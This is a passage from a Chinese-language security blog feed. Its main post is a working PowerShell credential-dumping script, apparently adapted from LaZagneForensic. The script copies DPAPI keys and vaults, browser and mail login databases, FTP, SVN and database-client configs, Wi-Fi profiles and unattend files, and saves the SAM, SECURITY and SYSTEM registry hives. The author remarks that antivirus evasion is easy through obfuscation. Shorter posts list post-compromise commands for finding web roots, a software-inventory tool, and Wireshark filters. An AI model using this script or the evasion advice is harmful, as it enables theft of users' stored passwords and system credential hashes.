= $root + '\' + $d['name']</div><div class="line"> CreateDir($mozilla_folder)</div><div class="line"></div><div class="line"> $profiles = Get-ChildItem -Path $mozilla_software_path</div><div class="line"> foreach ($profile in $profiles.Name)</div><div class="line"> {</div><div class="line"> $profile_folder = $mozilla_folder + '\' + $profile</div><div class="line"> CreateDir($profile_folder)</div><div class="line"> for ($i=0; $i -lt $d['files'].length; $i++) {</div><div class="line"> $path = $d['paths'].replace('[USER]', $user) + '\' + $profile + '\' + $d['files'][$i]</div><div class="line"> $dst = $profile_folder + '\' + $d['files'][$i]</div><div class="line"></div><div class="line"> CopyFile $path $dst</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line"># 适用于Chrome和一些浏览器</div><div class="line">function ManageChromeProfile($root, $user, $d)</div><div class="line">{</div><div class="line"> $chrome_folder = $root + '\' + $d['name']</div><div class="line"></div><div class="line"> $path = $d['paths'].replace('[USER]', $user)</div><div class="line"> $paths = Get-ChildItem -Path $path -Filter $d['file'] -Recurse -ErrorAction SilentlyContinue -Force</div><div class="line"> </div><div class="line"> If ($paths -ne $null){</div><div class="line"> CreateDir($chrome_folder)</div><div class="line"> foreach ($p in $paths.Directory.Name)</div><div class="line"> {</div><div class="line"> $profile_folder = $chrome_folder + '\' + $p</div><div class="line"> CreateDir($profile_folder)</div><div class="line"> </div><div class="line"> $src = $path + '\' + $p + '\' + $d['file']</div><div class="line"> $dst = $profile_folder + '\' + $d['file']</div><div class="line"></div><div class="line"> CopyFile $src $dst</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">function CopyFile($path, $dst){</div><div class="line"> if (Test-Path $path) {</div><div class="line"> if ((Get-Item $path) -is [System.IO.DirectoryInfo])</div><div class="line"> {</div><div class="line"> # Directory</div><div class="line"> Copy-Item -Recurse -Path $path -Destination $dst</div><div class="line"> }</div><div class="line"> else</div><div class="line"> {</div><div class="line"> # File</div><div class="line"> Copy-Item -Path $path -Destination $dst</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">function CreateDir($path){</div><div class="line"> If(!(Test-Path $path))</div><div class="line"> {</div><div class="line"> $new_dir = New-Item -ItemType Directory -Force -Path $path</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">function SaveHives($hives_folder)</div><div class="line">{</div><div class="line"> CreateDir($hives_folder)</div><div class="line"> $dst = $hives_folder + '\SAM'</div><div class="line"> $sam = reg.exe save hklm\sam $dst </div><div class="line"> </div><div class="line"> $dst = $hives_folder + '\SECURITY'</div><div class="line"> $secu = reg.exe save hklm\security $dst </div><div class="line"> </div><div class="line"> $dst = $hives_folder + '\SYSTEM'</div><div class="line"> $sys = reg.exe save hklm\system $dst </div><div class="line">}</div><div class="line"></div><div class="line"></div><div class="line">function Dump</div><div class="line">{ </div><div class="line"><#</div><div class="line"> .PARAMETER Out</div><div class="line"> 指定所有文件将被复制的目录的名称(默认:转储)</div><div class="line"> </div><div class="line"> .EXAMPLE</div><div class="line"> PS C:\> Dump</div><div class="line"></div><div class="line"> .EXAMPLE</div><div class="line"> PS C:\> Dump -Out dump</div><div class="line">#></div><div class="line"> </div><div class="line"> Param(</div><div class="line"> [Parameter(Mandatory = $False)]</div><div class="line"> [String]</div><div class="line"> $Out = 'dump'</div><div class="line"> )</div><div class="line"></div><div class="line"> $usersFolder = $Out + '\Users'</div><div class="line"> $systemFolder = $Out + '\System'</div><div class="line"> $users = Get-ChildItem -Path C:\Users</div><div class="line"> </div><div class="line"> CreateDir($Out)</div><div class="line"> CreateDir($usersFolder)</div><div class="line"> CreateDir($systemFolder)</div><div class="line"></div><div class="line"> ######################################### 用户软件 #########################################</div><div class="line"></div><div class="line"> ##################### DPAPI ####################</div><div class="line"></div><div class="line"> $dpapi_roaming = @{</div><div class="line"> 'name' = 'DPAPI'</div><div class="line"> 'subfolder' = 'Roaming'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\Microsoft\Protect',</div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\Microsoft\Credentials',</div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\Microsoft\Vault'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $dpapi_local = @{</div><div class="line"> 'name' = 'DPAPI'</div><div class="line"> 'subfolder' = 'Local'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\Users\[USER]\AppData\Local\Microsoft\Credentials',</div><div class="line"> 'C:\Users\[USER]\AppData\Local\Microsoft\Vault'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> ##################### 浏览器 ####################</div><div class="line"> </div><div class="line"> $firefox = @{</div><div class="line"> 'name' = 'Firefox'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\Mozilla\Firefox\Profiles')</div><div class="line"> 'files' = @(</div><div class="line"> 'key4.db',</div><div class="line"> 'key3.db',</div><div class="line"> 'logins.json',</div><div class="line"> 'cert8.db'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $chrome = @{</div><div class="line"> 'name' = 'Chrome'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Local\Google\Chrome\User Data')</div><div class="line"> 'file' = 'Login Data'</div><div class="line"> }</div><div class="line"></div><div class="line"> $coccoc = @{</div><div class="line"> 'name' = 'Coccoc'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Local\CocCoc\Browser\User Data')</div><div class="line"> 'file' = 'Login Data'</div><div class="line"> }</div><div class="line"></div><div class="line"> $opera = @{</div><div class="line"> 'name' = 'Opera'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\Opera Software\Opera Stable\Login Data')</div><div class="line"> }</div><div class="line"></div><div class="line"></div><div class="line"> ##################### 聊天软件 ####################</div><div class="line"></div><div class="line"> $pidgin = @{</div><div class="line"> 'name' = 'Pidgin'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\.purple\accounts.xml')</div><div class="line"> }</div><div class="line"></div><div class="line"> ##################### 数据库 #####################</div><div class="line"></div><div class="line"> $dbvis = @{</div><div class="line"> 'name' = 'Dbvis'</div><div class="line"> 'paths' = @('C:\Users\[USER]\.dbvis\config70\dbvis.xml')</div><div class="line"> }</div><div class="line"></div><div class="line"> $robomongo = @{</div><div class="line"> 'name' = 'Robomongo'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\Users\[USER]\.config\Robomongo\robomongo.json',</div><div class="line"> 'C:\Users\[USER]\.3T\robo-3t\1.1.1\robo3t.json'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $squirrel = @{</div><div class="line"> 'name' = 'Squirrel'</div><div class="line"> 'paths' = @('C:\Users\[USER]\.squirrel-sql\SQLAliases23.xml')</div><div class="line"> }</div><div class="line"></div><div class="line"> $sqlDeveloper = @{</div><div class="line"> 'name' = 'SQL Developer'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\SQL Developer')</div><div class="line"> 'files' = @(</div><div class="line"> 'product-preferences.xml',</div><div class="line"> 'connections.xml'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"></div><div class="line"> ##################### 邮件 #####################</div><div class="line"></div><div class="line"> $thunderbird = @{</div><div class="line"> 'name' = 'Thunderbird'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\Thunderbird\Profiles')</div><div class="line"> 'files' = @(</div><div class="line"> 'key3.db',</div><div class="line"> 'logins.json',</div><div class="line"> 'cert8.db'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> ##################### SVN #####################</div><div class="line"></div><div class="line"> $tortoise = @{</div><div class="line"> 'name' = 'Tortoise'</div><div class="line"> 'paths' = @('C:\Users\[USER]\AppData\Roaming\Subversion\auth\svn.simple')</div><div class="line"> }</div><div class="line"></div><div class="line"> ##################### Sysadmin #####################</div><div class="line"></div><div class="line"> $apacheDirectoryStudio = @{</div><div class="line"> 'name' = 'ApacheDirectoryStudio'</div><div class="line"> 'paths' = @('C:\Users\[USER]\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.core\connections.xml')</div><div class="line"> }</div><div class="line"></div><div class="line"> $filezilla = @{</div><div class="line"> 'name' = 'Filezilla'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\FileZilla\sitemanager.xml', </div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\FileZilla\recentservers.xml', </div><div class="line"> 'C:\Users\[USER]\AppData\Roaming\FileZilla\filezilla.xml'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $ftpNavigator = @{</div><div class="line"> 'name' = 'FTP Navigator'</div><div class="line"> 'paths' = @('C:\FTP Navigator\Ftplist.txt')</div><div class="line"> }</div><div class="line"></div><div class="line"> </div><div class="line"> # 循环遍历所有用户</div><div class="line"> foreach ($user in $users.Name)</div><div class="line"> {</div><div class="line"> if ($user -ne "Public"){</div><div class="line"> $userFolder = $usersFolder + '\' + $user</div><div class="line"> CreateDir($userFolder)</div><div class="line"></div><div class="line"> # --- DPAPI ---</div><div class="line"> $dpapi_folder = $userFolder + '\' + $dpapi_roaming['name']</div><div class="line"> CreateDir($dpapi_folder)</div><div class="line"></div><div class="line"> $dpapi_roaming_folder = $dpapi_folder + '\' + $dpapi_roaming['subfolder'].replace('[USER]', $user)</div><div class="line"> CreateDir($dpapi_roaming_folder)</div><div class="line"> CheckFiles $dpapi_roaming_folder $user $dpapi_roaming</div><div class="line"></div><div class="line"> $dpapi_local_folder = $dpapi_folder + '\' + $dpapi_local['subfolder'].replace('[USER]', $user)</div><div class="line"> CreateDir($dpapi_local_folder)</div><div class="line"> CheckFiles $dpapi_local_folder $user $dpapi_local </div><div class="line"></div><div class="line"> # --- Browsers ---</div><div class="line"> ManageMozilla $userFolder $user $firefox</div><div class="line"> ManageChromeProfile $userFolder $user $chrome</div><div class="line"> ManageChromeProfile $userFolder $user $coccoc</div><div class="line"></div><div class="line"> $dst = $userFolder + '\' + $opera['name']</div><div class="line"> CheckFiles $dst $user $opera</div><div class="line"></div><div class="line"> # --- Chats ---</div><div class="line"> $dst = $userFolder + '\' + $pidgin['name']</div><div class="line"> CheckFiles $dst $user $pidgin</div><div class="line"></div><div class="line"> # --- Databases ---</div><div class="line"> $dst = $userFolder + '\' + $dbvis['name']</div><div class="line"> CheckFiles $dst $user $dbvis</div><div class="line"> </div><div class="line"> $dst = $userFolder + '\' + $robomongo['name']</div><div class="line"> CheckFiles $dst $user $robomongo</div><div class="line"></div><div class="line"> $dst = $userFolder + '\' + $squirrel['name']</div><div class="line"> CheckFiles $dst $user $squirrel</div><div class="line"></div><div class="line"> # Manage SQL Developer</div><div class="line"> foreach ($files in $sqlDeveloper['files'])</div><div class="line"> {</div><div class="line"> $paths = Get-ChildItem -Path $sqlDeveloper['paths'].replace('[USER]', $user) -Filter $files -Recurse -ErrorAction SilentlyContinue -Force</div><div class="line"> If ($paths -ne $null){</div><div class="line"> $sqldev_folder = $userFolder + '\' + $sqlDeveloper['name']</div><div class="line"> CreateDir($sqldev_folder)</div><div class="line"> foreach ($p in $paths.FullName)</div><div class="line"> {</div><div class="line"> CopyFile $p $sqldev_folder</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"></div><div class="line"> # --- Mail ---</div><div class="line"> ManageMozilla $userFolder $user $thunderbird</div><div class="line"></div><div class="line"> # --- Svn ---</div><div class="line"> $dst = $userFolder + '\' + $tortoise['name']</div><div class="line"> CheckFiles $dst $user $tortoise</div><div class="line"> </div><div class="line"> # --- Sysadmin ---</div><div class="line"> $dst = $userFolder + '\' + $apacheDirectoryStudio['name']</div><div class="line"> CheckFiles $dst $user $apacheDirectoryStudio</div><div class="line"></div><div class="line"> $dst = $userFolder + '\' + $filezilla['name']</div><div class="line"> CheckFiles $dst $user $filezilla</div><div class="line"></div><div class="line"> $dst = $userFolder + '\' + $ftpNavigator['name']</div><div class="line"> CheckFiles $dst $user $ftpNavigator</div><div class="line"> }</div><div class="line"> }</div><div class="line"></div><div class="line"> ######################################### 系统密码 #########################################</div><div class="line"></div><div class="line"> ##################### DPAPI ####################</div><div class="line"></div><div class="line"> $dpapi_system = @{</div><div class="line"> 'name' = 'DPAPI'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\Windows\System32\Microsoft\Protect',</div><div class="line"> 'C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Vault'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $unattended = @{</div><div class="line"> 'name' = 'Unattended'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\Windows\Panther\Unattend.xml', </div><div class="line"> 'C:\Windows\Panther\Unattended.xml',</div><div class="line"> 'C:\Windows\Panther\Unattend\Unattended.xml',</div><div class="line"> 'C:\Windows\Panther\Unattend\Unattend.xml',</div><div class="line"> 'C:\Windows\System32\Sysprep\unattend.xml',</div><div class="line"> 'C:\Windows\System32\Sysprep\Panther\unattend.xml'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> $wifi = @{</div><div class="line"> 'name' = 'Wifi'</div><div class="line"> 'paths' = @(</div><div class="line"> 'C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces'</div><div class="line"> )</div><div class="line"> }</div><div class="line"></div><div class="line"> # --- DPAPI ---</div><div class="line"> $dst = $systemFolder + '\' + $dpapi_system['name']</div><div class="line"> CheckFiles $dst '' $dpapi_system</div><div class="line"></div><div class="line"> # --- Unattended ---</div><div class="line"> $dst = $systemFolder + '\' + $unattended['name']</div><div class="line"> CheckFiles $dst '' $unattended</div><div class="line"></div><div class="line"> # --- Wifi ---</div><div class="line"> $dst = $systemFolder + '\' + $wifi['name']</div><div class="line"> CheckFiles $dst '' $wifi</div><div class="line"></div><div class="line"> # saves system hives from registry</div><div class="line"> SaveHives($systemFolder + '\' + 'Hives')</div><div class="line"></div><div class="line"> "Folder " + $Out + " created successfully !"</div><div class="line">}</div></pre></td></tr></table></figure>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>from <a href="https://github.com/AlessandroZ/LaZagneForensic" target="_blank" rel="external">https://github.com/AlessandroZ/LaZagneForensic</a></p>
<p>优点,免杀好做,python,powershell混淆一下就可以了<br>缺点,数据传输难免复杂,zip加密后倒是可以用用</p>
]]></content>
<tags>
<tag> system </tag>
</tags>
</entry>
<entry>
<title><![CDATA[txt to video]]></title>
<url>http://phpplay.github.io/2018/03/19/txt-to-video/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="powershell-code"><a href="#powershell-code" class="headerlink" title="powershell code"></a>powershell code</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">$Sentence = "Who are you"</div><div class="line"> (new-object -com SAPI.SpVoice).speak("$Sentence")</div></pre></td></tr></table></figure>
<h2 id="c-code"><a href="#c-code" class="headerlink" title="c# code"></a>c# code</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line">using System;</div><div class="line">using SpeechLib;</div><div class="line">using System.Windows.Forms;</div><div class="line"></div><div class="line">namespace WindowsFormsApplication1</div><div class="line">{ public partial class Form1 : Form</div><div class="line"> {</div><div class="line"> public Form1()</div><div class="line"> {</div><div class="line"> InitializeComponent();</div><div class="line"> }</div><div class="line"></div><div class="line"> private void button1_Click(object sender, EventArgs e)</div><div class="line"> {</div><div class="line"> SpVoice voice = new SpVoice();</div><div class="line"> voice.Speak(textBox1.Text);</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> c# </tag>
</tags>
</entry>
<entry>
<title><![CDATA[softlist]]></title>
<url>http://phpplay.github.io/2018/03/12/softlist/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="softlist"><a href="#softlist" class="headerlink" title="softlist"></a>softlist</h2><p>前段时间看到 @3gstudent 用来提取软件列表的<a href="https://github.com/3gstudent/ListInstalledPrograms" target="_blank" rel="external">powershell脚本</a>,于是就写了个c#版本的,bug不少,不过勉强够用,在x64上提取不全,过段时间再改进一下</p>
<h3 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div></pre></td><td class="code"><pre><div class="line">using System;</div><div class="line">using System.Collections.Generic;</div><div class="line">using System.Text;</div><div class="line">using System.Management;</div><div class="line">using Microsoft;</div><div class="line">using Microsoft.Win32;</div><div class="line"></div><div class="line">namespace softlist</div><div class="line">{</div><div class="line"> class Program</div><div class="line"> {</div><div class="line"> private static string OSBit()</div><div class="line"> {</div><div class="line"> try</div><div class="line"> {</div><div class="line"> ConnectionOptions oConn = new ConnectionOptions();</div><div class="line"> System.Management.ManagementScope managementScope = new System.Management.ManagementScope("\\\\localhost", oConn);</div><div class="line"> System.Management.ObjectQuery objectQuery = new System.Management.ObjectQuery("select AddressWidth from Win32_Processor");</div><div class="line"> ManagementObjectSearcher moSearcher = new ManagementObjectSearcher(managementScope, objectQuery);</div><div class="line"> ManagementObjectCollection moReturnCollection = null;</div><div class="line"> string addressWidth = null;</div><div class="line"> moReturnCollection = moSearcher.Get();</div><div class="line"> foreach (ManagementObject oReturn in moReturnCollection)</div><div class="line"> {</div><div class="line"> addressWidth = oReturn["AddressWidth"].ToString();</div><div class="line"> }</div><div class="line"> return addressWidth;</div><div class="line"> }</div><div class="line"> catch</div><div class="line"> {</div><div class="line"> return "获取错误";</div><div class="line"> }</div><div class="line"> }</div><div class="line"> static void Main(string[] args)</div><div class="line"> {</div><div class="line"> //string a = softlist.Program.OSBit();</div><div class="line"> if (softlist.Program.OSBit() == "32")</div><div class="line"> {</div><div class="line"> using (RegistryKey key32 = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", false))</div><div class="line"> {</div><div class="line"> if (key32 != null)</div><div class="line"> {</div><div class="line"> foreach (string keyName in key32.GetSubKeyNames())</div><div class="line"> {</div><div class="line"> using (RegistryKey key2 = key32.OpenSubKey(keyName, false))</div><div class="line"> {</div><div class="line"> if (key2 != null)</div><div class="line"> {</div><div class="line"> string softwareName = key2.GetValue("DisplayName", "").ToString();</div><div class="line"> string installLocation = key2.GetValue("InstallLocation", "").ToString();</div><div class="line"> if (!string.IsNullOrEmpty(installLocation))</div><div class="line"> {</div><div class="line"> Console.WriteLine(string.Format("软件名:{0} --- 安装路径:{1}\r", softwareName, installLocation));</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> else</div><div class="line"> {</div><div class="line"></div><div class="line"> using (RegistryKey key64 = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\", false))</div><div class="line"> {</div><div class="line"> if (key64 != null)</div><div class="line"> {</div><div class="line"> foreach (string keyName in key64.GetSubKeyNames())</div><div class="line"> {</div><div class="line"> using (RegistryKey key2 = key64.OpenSubKey(keyName, false))</div><div class="line"> {</div><div class="line"> if (key2 != null)</div><div class="line"> {</div><div class="line"> string softwareName = key2.GetValue("DisplayName", "").ToString();</div><div class="line"> string installLocation =key2.GetValue("InstallLocation", "").ToString();</div><div class="line"> if (!string.IsNullOrEmpty(installLocation))</div><div class="line"> {</div><div class="line"> Console.WriteLine(string.Format("软件名:{0} --- 安装路径:{1}\r",softwareName, installLocation));</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> Console.WriteLine("\r\n--------------------------------------个分割线---------------------------------------\r\n");</div><div class="line"> using (RegistryKey key32 = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\", false))</div><div class="line"> {</div><div class="line"> if (key32 != null)</div><div class="line"> {</div><div class="line"> foreach (string keyName in key32.GetSubKeyNames())</div><div class="line"> {</div><div class="line"> using (RegistryKey key2 = key32.OpenSubKey(keyName, false))</div><div class="line"> {</div><div class="line"> if (key2 != null)</div><div class="line"> {</div><div class="line"> string softwareName = key2.GetValue("DisplayName", "").ToString();</div><div class="line"> string installLocation = key2.GetValue("InstallLocation", "").ToString();</div><div class="line"> if (!string.IsNullOrEmpty(installLocation))</div><div class="line"> {</div><div class="line"> Console.WriteLine(string.Format("软件名:{0} --- 安装路径:{1}\r", softwareName, installLocation));</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> </div><div class="line"> }</div><div class="line"> </div><div class="line"> }</div><div class="line"> Console.ReadLine();</div><div class="line"> }</div><div class="line"> </div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> c# </tag>
</tags>
</entry>
<entry>
<title><![CDATA[where is web path]]></title>
<url>http://phpplay.github.io/2017/10/16/where-is-web-path/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="where-is-web-path-from-wooyun-zone"><a href="#where-is-web-path-from-wooyun-zone" class="headerlink" title="where is web path (from wooyun zone)"></a>where is web path (from wooyun zone)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">find / -name "*.php"</div><div class="line">find . -name "*.类型" | xargs grep "关键字"</div><div class="line">find / -name nginx.conf</div><div class="line">find / -name httpd.conf</div><div class="line">find robots.txt</div><div class="line">locate robots.txt</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">.bash_history</div><div class="line">httpd,nginx,tomcat,jboss的error_log</div><div class="line">/proc/self/cmdline</div><div class="line">/proc/self/maps</div><div class="line">web容器路径-->配置文件</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">win: findstr /s /i /n /d:C:\ "htmlString" *.*</div><div class="line">linux: find / -name "*.*" | xargs grep "htmlString"</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">cat /etc/nginx/conf/vhost/web.conf | grep root</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">echo "-----------------------start---------------------";find /etc -maxdepth 3 -name "*" 2>&1|xargs grep -s -i 'root /'| grep -s -i 'nginx\|apache';echo "-----------------------done----------------------"</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">For I in (curl http://localhost |grep -oP ([a-Z]{1-6})[\.js]));do for d in $(find / -name "*.js");do grep $i $d;done;done</div><div class="line">没实验,意思是打开首页匹配js文件。系统内搜索所有文件js文件,匹配js文件名</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">win:</div><div class="line">wmic datafile where "filename='123' and extension='avi'" get caption</div><div class="line"></div><div class="line">dir /s/a-d/b d:\*重复度较低的文件名(支持通配符)*</div><div class="line"></div><div class="line">where /r c: *.php</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">history | grep cd | grep -v grep | grep -E 'www|html|nginx|apache|php|lighttp|web' -i</div><div class="line"></div><div class="line">history | grep -E 'cd|vi|ed|nano|et|mkdir|rm|find|ls|mv' | grep -v grep | grep -E 'www|html|nginx|apache|php|lighttp|web' -i</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">1、netstat -anp | grep [port] --> PID</div><div class="line">2、ps -p [PID] -o cmd ww --> PID对应的启动命令(假设存在反向代理,则为bin目录)</div><div class="line">3、cd ../conf --> 寻找nginx.conf/httpd.conf</div><div class="line">4、通过反向代理ProxyPass/ProxyPassReverse找到对应的webapp端口号port2</div><div class="line">5、netstat -anp | grep [port2] --> PID2(web app的进程)</div><div class="line">6、ps -p [PID2] -o cmd ww --> PID2的“Catalina.base”</div><div class="line">7、cd 到“Catalina.base” --> server.xml</div><div class="line">8、从server.xml中找到appBase 和 docBase</div><div class="line">9、cd 到 $docBase/$appBase,即为当前web app路径。</div></pre></td></tr></table></figure>
]]></content>
<tags>
<tag> web </tag>
</tags>
</entry>
<entry>
<title><![CDATA[简单的Wireshark抓包]]></title>
<url>http://phpplay.github.io/2017/07/20/Wireshark/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="wireshark过滤规则"><a href="#wireshark过滤规则" class="headerlink" title="wireshark过滤规则"></a>wireshark过滤规则</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line">常用的 直接在过滤规则输入 </div><div class="line"></div><div class="line">http </div><div class="line">tcp </div><div class="line">udp </div><div class="line">tcp.port == 80 || udp.port == 80</div><div class="line">ip.addr== 192.168.70.159</div><div class="line"></div><div class="line">http没有tcp.port == 80 || udp.port == 80效果好</div><div class="line">这些规则显示过滤器里面都有</div><div class="line"></div><div class="line">ip.后面有很多的选项</div><div class="line">可以用 || 来代表or</div><div class="line">&& 为 and 等等都很简单</div><div class="line">最简单的方法 就是找到一个想要的包,右键 把它设置为规则</div><div class="line">复杂一点的话,就去看帮助,学习过滤正则就好了</div><div class="line"></div><div class="line">PS:最好用中文版,看着省事</div></pre></td></tr></table></figure>
